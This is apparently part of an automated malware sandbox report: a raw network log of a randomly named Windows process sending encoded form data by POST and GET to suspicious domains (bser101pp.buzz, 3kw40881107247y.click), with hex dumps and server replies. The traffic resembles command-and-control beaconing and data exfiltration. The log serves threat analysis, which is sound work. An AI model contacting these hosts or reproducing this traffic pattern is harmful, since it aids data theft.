                                                                                                                    CF-RAY: 8e61e45e3a537cf4-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=630&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                                    Nov 21, 2024 17:00:20.509835005 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    51192.168.2.450053104.21.58.90803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 17:00:21.944026947 CET10712OUTPOST /crrp/ HTTP/1.1
                                                                                                                    Host: www.bser101pp.buzz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.bser101pp.buzz
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.bser101pp.buzz/crrp/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 6a 72 4c 2f 61 36 58 79 35 4c 75 51 70 46 44 76 70 43 41 2f 71 6f 42 57 38 59 4d 62 49 4f 50 4c 50 6e 39 4e 4a 71 6b 66 5a 6d 6b 68 54 48 6a 67 79 47 69 75 6c 4a 69 44 4f 2b 73 2f 30 6f 62 6b 4d 76 7a 30 41 4f 6f 31 32 2b 6e 52 47 46 32 35 70 73 74 6c 6a 31 6c 76 2f 71 33 30 37 73 65 73 47 65 57 63 61 69 62 2b 64 66 30 5a 72 48 53 71 64 6d 69 69 45 69 4b 31 5a 44 47 52 38 4d 44 69 79 45 70 42 45 73 74 46 58 36 41 76 5a 6b 71 55 78 71 64 45 50 6c 64 73 47 76 57 59 6b 69 66 71 4f 59 36 44 30 51 39 47 71 42 45 4e 2b 6f 78 50 44 50 31 66 50 41 56 68 69 62 72 36 36 66 4c 75 2b 37 31 59 4e 41 73 73 51 74 71 4b 47 4c 51 59 4e 48 41 43 69 33 45 79 78 2b 42 56 6e 51 53 33 35 59 37 39 49 46 59 6a 75 53 2b 6a 55 52 35 66 4b 43 62 67 6f 48 7a 4b 35 47 79 30 33 64 36 49 47 64 57 6a 34 4b 79 4f 69 57 30 70 35 46 70 6f 58 5a 31 66 59 6f 41 62 6b 75 2b 65 6f 62 4e 56 74 66 2f 46 6e 31 6a 4d 61 53 50 2b 4d 49 79 36 4c 41 56 38 59 59 35 4d 4d 73 58 4c 49 34 75 73 43 31 59 75 44 64 4f 30 59 43 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=jrL/a6Xy5LuQpFDvpCA/qoBW8YMbIOPLPn9NJqkfZmkhTHjgyGiulJiDO+s/0obkMvz0AOo12+nRGF25pstlj1lv/q307sesGeWcaib+df0ZrHSqdmiiEiK1ZDGR8MDiyEpBEstFX6AvZkqUxqdEPldsGvWYkifqOY6D0Q9GqBEN+oxPDP1fPAVhibr66fLu+71YNAssQtqKGLQYNHACi3Eyx+BVnQS35Y79IFYjuS+jUR5fKCbgoHzK5Gy03d6IGdWj4KyOiW0p5FpoXZ1fYoAbku+eobNVtf/Fn1jMaSP+MIy6LAV8YY5MMsXLI4usC1YuDdO0YCMR0x84AhowH+byqipR05sOM9Yws8HJU/VdPZpo8SJrDhL4eZ8TSfuJCkU37Po8hzyL1zPX8njvCvQK6tGb5Ztm5VuBiunpvPmM4tmTL15AnlyMGfIud75T0+TKdyUtKxEMuZ3is8w3KHNn5inHgG6leeGNAYjmoffoejSjYZHtu9xLxf8UwjwY0aviHUYePklMWWzVwgt+7QxU7ao2DMXMiH38Cnr6pes0V/YHM+xkCg5w7bZ5kYPp1dy6AvEVzFRCa0Zizxo2MgdtTp7w22rlL8lzqwfF4YklqBA8uOU0fEF3pRYU+//VtpHCW59eOqd7GQKquIR3XPCDtHf4jl5ovTWObiGYlcRtqG2Q4dNAqHqECtTZSfBopkrvIOzJGHiZ5EG7/JF5wv//VEJfqEsFZQLEefQ8dgibFiP4oswvk0jculdhMdDEYbj8pXcHDrZR+6bl6XuTO4mCJi1HtqwIzVABTScWtqfzxAenyqI9LTXidEiWliOTPo/oBxy0oSO/M7k8j0yA43el2XLL/vje1FPoRzoDr0mcHwpHzBjNKQk261keokcCjBNiQ6a/E6v/ROp3woi4Sp9Y8MxNbg0/Oop5zNPtA/1CzjL142gU24It3DqcI02DCyiHKPHi8NavjkMB6MjrGv6TKxGG4RN6t3iK+7+/eGVW [TRUNCATED]
                                                                                                                    Nov 21, 2024 17:00:23.178004026 CET948INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 16:00:23 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BC71uhOBDL1cBwtKbLoXJ2WFTanY4EHZWTozwTZHgTKg5kTaDxq30sw9EIqHszfhqx8oABvXNmS08FAuphHGKy5f0CtJSwM5OMzK4AC%2BQn5NpIJHVtaoeIau6GRqK9svoO5lEGs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e46f190142f8-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10712&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    52192.168.2.450054104.21.58.90803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 17:00:24.600445986 CET348OUTGET /crrp/?GzeXFT7=upjfZKq4/ZGfoF/MvQQxhfVT264zV9bCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/nGZJ+pHk7Nqqe9OIf3jZd8YCzRO5KH2eHFc=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.bser101pp.buzz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 17:00:25.873050928 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 16:00:25 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TLXuM0H0vCB2WAMRGO5Sfv5AAAyZigRVv%2F8qI3tCgl%2FrBvo7uvHpf%2F2m4Zp9aOFEUFSkuy2egxOMghctO3jTA6u3uNZwUMbm6TLuY75m8NH4k6SxeS7tsliqn%2FpXRHFlqzlTeNM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e47ffa505e76-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1599&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=348&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page --><
                                                                                                                    Nov 21, 2024 17:00:25.873084068 CET73INData Raw: 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: !-- a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    53192.168.2.450055172.67.192.207803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 17:00:31.391370058 CET631OUTPOST /6wln/ HTTP/1.1
                                                                                                                    Host: www.3kw40881107247y.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.3kw40881107247y.click
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.3kw40881107247y.click/6wln/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 74 6d 53 6b 58 53 65 6f 51 79 6b 58 78 5a 70 35 6e 42 56 39 79 4c 63 64 62 41 47 51 62 59 38 6b 6a 56 55 72 77 32 48 6c 45 6a 35 79 78 4a 68 44 4b 55 62 4a 34 31 59 66 59 50 66 6d 76 64 6c 5a 76 4c 66 61 39 4b 6f 79 46 33 2b 30 39 74 56 41 64 75 49 42 43 76 66 47 77 44 47 65 6c 45 6f 55 51 62 56 2f 30 4f 79 57 31 39 2f 70 59 41 49 36 36 72 53 34 75 4d 43 64 2b 33 32 46 37 2b 6c 70 6c 65 39 65 47 6f 55 6b 78 34 45 46 4f 66 32 69 52 35 38 44 31 75 54 35 6b 45 36 45 61 42 6e 52 5a 45 39 5a 7a 57 31 32 50 30 75 2f 32 67 6b 64 57 55 59 58 30 74 6b 2b 45 48 67 46 41 61 6e 4a 47 41 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=tmSkXSeoQykXxZp5nBV9yLcdbAGQbY8kjVUrw2HlEj5yxJhDKUbJ41YfYPfmvdlZvLfa9KoyF3+09tVAduIBCvfGwDGelEoUQbV/0OyW19/pYAI66rS4uMCd+32F7+lple9eGoUkx4EFOf2iR58D1uT5kE6EaBnRZE9ZzW12P0u/2gkdWUYX0tk+EHgFAanJGA==
                                                                                                                    Nov 21, 2024 17:00:32.687391996 CET963INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 16:00:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6kRaFaoLR0dbZ5qxvIBk%2FCG12atO29A0VNI%2Fj0pM%2FqZntv5uUcYhL68Jv8MwOiVuL6%2F964PXWEAfmQ4qWD%2FJXFxo9lsVGR9zfn1%2BS59yZvtBChAVDcdsNij9V0PaIEb6GrVmwlpiTvMX%2Ficg"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e4aa498372a1-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    54192.168.2.450056172.67.192.207803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 17:00:34.072432995 CET651OUTPOST /6wln/ HTTP/1.1
                                                                                                                    Host: www.3kw40881107247y.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.3kw40881107247y.click
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.3kw40881107247y.click/6wln/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 74 6d 53 6b 58 53 65 6f 51 79 6b 58 78 36 68 35 71 47 42 39 6e 62 63 63 46 51 47 51 52 34 39 74 6a 56 49 72 77 33 54 31 45 57 70 79 78 70 52 44 62 6c 62 4a 31 56 59 66 58 76 66 76 68 39 6c 73 76 4c 53 76 39 4c 55 79 46 7a 75 30 39 6f 78 41 65 5a 30 41 44 2f 66 41 37 6a 47 63 68 45 6f 55 51 62 56 2f 30 4f 32 77 31 35 54 70 59 51 34 36 37 50 4f 33 6b 73 43 43 35 33 32 46 2f 2b 6c 31 6c 65 38 4c 47 70 59 65 78 36 38 46 4f 65 6d 69 52 73 63 43 36 75 54 37 35 30 36 54 63 6a 79 57 41 32 6b 53 39 6c 42 79 46 77 75 62 33 6d 70 48 48 6c 35 41 6d 74 41 4e 5a 41 70 78 4e 5a 61 41 64 44 48 37 2f 6e 4f 37 59 32 46 53 74 79 72 66 72 38 73 5a 70 35 51 3d
                                                                                                                    Data Ascii: GzeXFT7=tmSkXSeoQykXx6h5qGB9nbccFQGQR49tjVIrw3T1EWpyxpRDblbJ1VYfXvfvh9lsvLSv9LUyFzu09oxAeZ0AD/fA7jGchEoUQbV/0O2w15TpYQ467PO3ksCC532F/+l1le8LGpYex68FOemiRscC6uT7506TcjyWA2kS9lByFwub3mpHHl5AmtANZApxNZaAdDH7/nO7Y2FStyrfr8sZp5Q=
                                                                                                                    Nov 21, 2024 17:00:35.263382912 CET961INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 16:00:35 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPMe9KbSb%2B8T7JDQc1zPkSvxToRZUlV1j0mqWIaL0qoEO5l3LsLhx8tJOgTw6MgMBHl%2Fm5Vc94DaqQuwYSvbR%2FGd%2B6ApnaHFtSsG30zLAwuzdRT4WIfQGB4%2Fj7cboYyI1EVBD%2BHQKkxdwMAC"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e4bb2c700cd9-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1713&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    55192.168.2.450057172.67.192.207803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 17:00:36.743305922 CET6180OUTPOST /6wln/ HTTP/1.1
                                                                                                                    Host: www.3kw40881107247y.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.3kw40881107247y.click
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.3kw40881107247y.click/6wln/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 74 6d 53 6b 58 53 65 6f 51 79 6b 58 78 36 68 35 71 47 42 39 6e 62 63 63 46 51 47 51 52 34 39 74 6a 56 49 72 77 33 54 31 45 57 68 79 77 62 5a 44 4b 32 7a 4a 30 56 59 66 61 50 66 69 68 39 6c 4c 76 49 69 72 39 4c 59 45 46 31 79 30 76 36 35 41 57 4e 67 41 4e 2f 66 41 30 44 47 64 6c 45 6f 37 51 59 73 32 30 4f 6d 77 31 35 54 70 59 57 63 36 38 62 53 33 69 73 43 64 2b 33 32 42 37 2b 6c 52 6c 65 56 38 47 70 4e 38 78 71 63 46 4f 2b 57 69 43 50 30 43 7a 75 54 39 36 30 37 57 63 6a 75 5a 41 32 34 34 39 6c 46 59 46 33 65 62 31 53 4d 46 56 42 77 65 36 38 67 44 4c 52 64 61 4c 4c 4f 78 64 53 33 36 36 31 47 30 45 31 70 6c 74 6a 53 55 34 75 6f 53 2b 4f 58 6a 50 2b 75 75 66 31 4a 35 32 46 35 51 77 76 4e 37 7a 33 37 51 78 6f 39 46 39 54 73 50 51 69 42 52 77 2f 37 2b 38 62 73 66 42 41 64 37 7a 34 52 70 42 4c 74 7a 4d 43 6e 73 45 6a 70 46 62 46 69 51 6c 36 4f 4c 36 43 6a 73 6c 66 42 36 59 64 71 32 4c 6e 47 72 37 44 59 54 4e 62 54 4b 45 35 44 72 37 30 49 6e 59 57 68 2f 6c 50 51 6b 49 5a 79 55 6c 7a [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=tmSkXSeoQykXx6h5qGB9nbccFQGQR49tjVIrw3T1EWhywbZDK2zJ0VYfaPfih9lLvIir9LYEF1y0v65AWNgAN/fA0DGdlEo7QYs20Omw15TpYWc68bS3isCd+32B7+lRleV8GpN8xqcFO+WiCP0CzuT9607WcjuZA2449lFYF3eb1SMFVBwe68gDLRdaLLOxdS3661G0E1pltjSU4uoS+OXjP+uuf1J52F5QwvN7z37Qxo9F9TsPQiBRw/7+8bsfBAd7z4RpBLtzMCnsEjpFbFiQl6OL6CjslfB6Ydq2LnGr7DYTNbTKE5Dr70InYWh/lPQkIZyUlzxwF1oA0F5XE8hYSMHA9bW3eBVPIOVPOLlx1/f7e7R5AgUzOmWvT/XdnFk6jS/31AAmbjFY7ulYHvs34gFKuJOnkRS4r2dYPOekHs9dXefbEihLM4ZkuktY+yOPULQujhRiAiVLLHEOdt+6kGnuXv1FFeX4v4xhYc9LXTkyZ7Fgs4xJhaHvObWNAytpe7spY1cNKlBoc7AHjFm8nfbzd4yR60gm5c0Xtwp70D7tWLE0u359X7vS4ogB0qZ0SkeLBegQV35LQ5S4Rf/aQBNVSmXwZ1trqifeuu95IrYTTrPRA0kswRew7Y7Ca4wpeGqCLxbodGCehmDe+xBVJnxrGPZMFynpqiWLK5NICuDvd92vuJBP/OSdmfDKysi2rOGMiH4bxqfh8Yy+UJ56Vj+4vErPXBorpr2cZHnu9n+86xrCJKnym4TmY14kOfMzKy39KmrmAK0bDqAynIlkQDVKZns2oMha3W8yng8sCK7hUV5sT0+b+8JyoZ4bbds8BrUgSwpMtJHUZIZZ9htQkkkwjdvgDsTDyQbzB5KBytLIQY87bvhvIba8yUyZdXAMts1XUIRo8rucgmrotK3yTa3KEZ5aKY/hww9HMafiHgyMZmZJv14UhoWxx2zozBqQvAUNmVRH2NLJHOhf2b0fzhmp4ajH2dqctziBuYPr [TRUNCATED]
                                                                                                                    Nov 21, 2024 17:00:36.743359089 CET4553OUTData Raw: 33 6f 46 76 65 58 74 47 67 41 37 73 58 73 62 58 36 75 78 5a 70 35 72 7a 6c 35 31 74 62 6e 37 55 4c 5a 48 55 47 36 6c 6f 2b 51 69 68 45 47 69 2b 39 6b 42 54 44 6e 4c 4f 45 6e 34 5a 68 35 77 35 44 4a 50 35 44 4d 79 45 69 6f 33 5a 47 35 61 69 46 68
                                                                                                                    Data Ascii: 3oFveXtGgA7sXsbX6uxZp5rzl51tbn7ULZHUG6lo+QihEGi+9kBTDnLOEn4Zh5w5DJP5DMyEio3ZG5aiFh6u0t4/OW7RwZaMXuqbumdj7yRPcyLg/kYxJ+5ovZ6Q1Ns6YnrgUaiO/uSY1tnK/v+TLVN+BSxMqye5LZUBhouGTt6vdCSX3uSvCE9Pu9DhD1dwyMForZyG0y3kwEcYONjxqdiT8H3WPmYmPRvo3ORmApmJCBVGhLA
                                                                                                                    Nov 21, 2024 17:00:37.857378960 CET954INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 16:00:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAYh77uJSDRf2tZ60yWhM4XtMIYAVPuczwaFLZyfTM8q8o%2BjzoaV7zMxH5c7p4RzJLlLgT91KMgTum3ylV3a8UVx9gpLgMAnclNhxfwl9BJ7R3hOAR2DaZtBD6MCMgTPR5qsna5YRAEevGDl"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e4cb5dc142dd-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2133&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10733&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
